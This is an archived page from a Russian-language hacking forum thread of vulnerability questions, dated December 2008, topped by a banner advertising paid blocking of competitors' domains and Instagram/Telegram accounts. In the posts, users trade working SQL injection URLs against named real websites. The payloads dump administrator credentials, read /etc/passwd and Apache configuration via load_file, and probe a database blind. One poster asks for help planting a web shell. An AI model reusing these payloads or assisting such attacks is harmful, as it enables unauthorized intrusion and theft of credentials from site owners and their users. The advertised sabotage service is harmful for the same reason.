УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 407 из 1393

407

Опции темы

Поиск в этой теме

Опции просмотра

#4061

07.12.2008, 20:41

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

Провел на форуме:
5571194

Репутация: 1934

Отправить сообщение для AFoST с помощью ICQ

http://smartlip.com/symbian/fileshare/flist.php?cat=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from +information_schema.tables--%20%201
слепая скул

#4062

07.12.2008, 21:03

Thrasher88

Познающий

Регистрация: 18.04.2008

Сообщений: 62

Провел на форуме:
279406

Репутация: 37

А как тогда что то выводить? :/
или если скуля слепая, то все бесполезно?

#4063

07.12.2008, 21:06

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

Провел на форуме:
5571194

Репутация: 1934

http://forum.antichat.ru/showthread.php?t=43966 пункт 3.ЧТО ДЕЛАТЬ ЕСЛИ ОТСУТСТВУЮТ ВЫВОДИМЫЕ ПОЛЯ.

#4064

08.12.2008, 15:29

cric.cric

Познающий

Регистрация: 02.06.2008

Сообщений: 52

Провел на форуме:
218331

Репутация: 10

Доброе время суток!
Кто можеть подсказать как юзать скул ошибку!

Дело было так я использовал эксплойт для определение верси с античат с темы:Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов

Вот сам так скажем эксплойт

И когда я использовал эксплойт то пройжошла мускул ошибка!

Как можно юзать эту мускул ошибку !
Какие сценари можео выполнять с помощью этой ошибки!

Версия самого движка 5.2.1

Зарание всем спосибо!

#4065

08.12.2008, 15:31

cric.cric

Познающий

Регистрация: 02.06.2008

Сообщений: 52

Провел на форуме:
218331

Репутация: 10

извеняюсь за ошибку там я имею введу скул ошибку а не мускул!

#4066

08.12.2008, 15:34

aka PSIH

Постоянный

Регистрация: 07.02.2006

Сообщений: 630

Провел на форуме:
12985021

Репутация: 676

смотри ответ в теме которую ты создал...

p.s: Вместо [sql] ты должен подставить свой SQL - запрос
например
union select concat(username,0x3a,password) from jos_users

статьи читай, все ведь расписано...
https://forum.antichat.ru/showthread.php?t=43966
https://forum.antichat.ru/showthread.php?t=29369

#4067

08.12.2008, 18:34

Thrasher88

Познающий

Регистрация: 18.04.2008

Сообщений: 62

Провел на форуме:
279406

Репутация: 37

Цитата:

http://smartlip.com/symbian/fileshare/flist.php?cat=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from +information_schema.tables--%20%201
слепая скул

Спасибо! Не подскажите, если вы пользовались прогой Marathon Tool (как раз для blind-SQL), то там в поле "Target base URL" нужно вводить просто http://smartlip.com/symbian/fileshare/flist.php?cat=1 или http://smartlip.com/symbian/fileshare/flist.php?cat=-1' ?

А то что то я вручную найти таблицы не смог, да и прога почему то не хочет

Для определения БД пробовал такие варианты:

Код:

http://smartlip.com/symbian/fileshare/flist.php?cat=1+and+substring(version(),1,1)>1--%20%201
http://smartlip.com/symbian/fileshare/flist.php?cat=1+and+substring(version(),1,1)<5--%20%201
http://smartlip.com/symbian/fileshare/flist.php?cat=1+and+substring(version(),1,1)=5--%20%201

И во всех результатах ничего не выводится, точнее ошибок не выводится..

Последний раз редактировалось Thrasher88; 08.12.2008 в 19:04..

#4068

09.12.2008, 04:19

Korney

Новичок

Регистрация: 10.08.2007

Сообщений: 26

Провел на форуме:
239619

Репутация: 38

помогите раскрутить скуль
hххp://kpi.ua/board/index.php?action=list_messages&section_id=2&module =1'

#4069

09.12.2008, 04:26

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

Провел на форуме:
1571865

Репутация: 571

Отправить сообщение для R1dex с помощью ICQ

http://kpi.ua/board/index.php?action=list_messages&section_id=-1+union+select+concat_ws(0x2f,name,pwd)+from+docum ent.nuke_authors+limit+0,1--

http://kpi.ua/board/index.php?action=list_messages&section_id=-1+union+select+load_file(0x2F6574632F706173737764)--

Последний раз редактировалось R1dex; 09.12.2008 в 04:32..

#4070

09.12.2008, 05:13

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

Помогите залить шелл на предидущий пост))
Ковычки не фильтрует и дает читать /etc/passwd
http://kpi.ua/board/index.php?action=list_messages&section_id=-1+union+select+load_file(0x2f6574632f6170616368653 22f68747470642e636f6e66)-- - содержание httpd.conf - вроде как тут должны буть всякие диры... или полный путь... но я не нашел((
http://kpi.ua/board/index.php?action=list_messages&section_id=-1+union+select+'123'+from+mysql.user+into+outfile+ '/board/123.txt'-- - пробывал такой запрос - не получилось(( Видимо нужен полный путь, а я его никак найти не могу((

Страница 407 из 1393

407

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход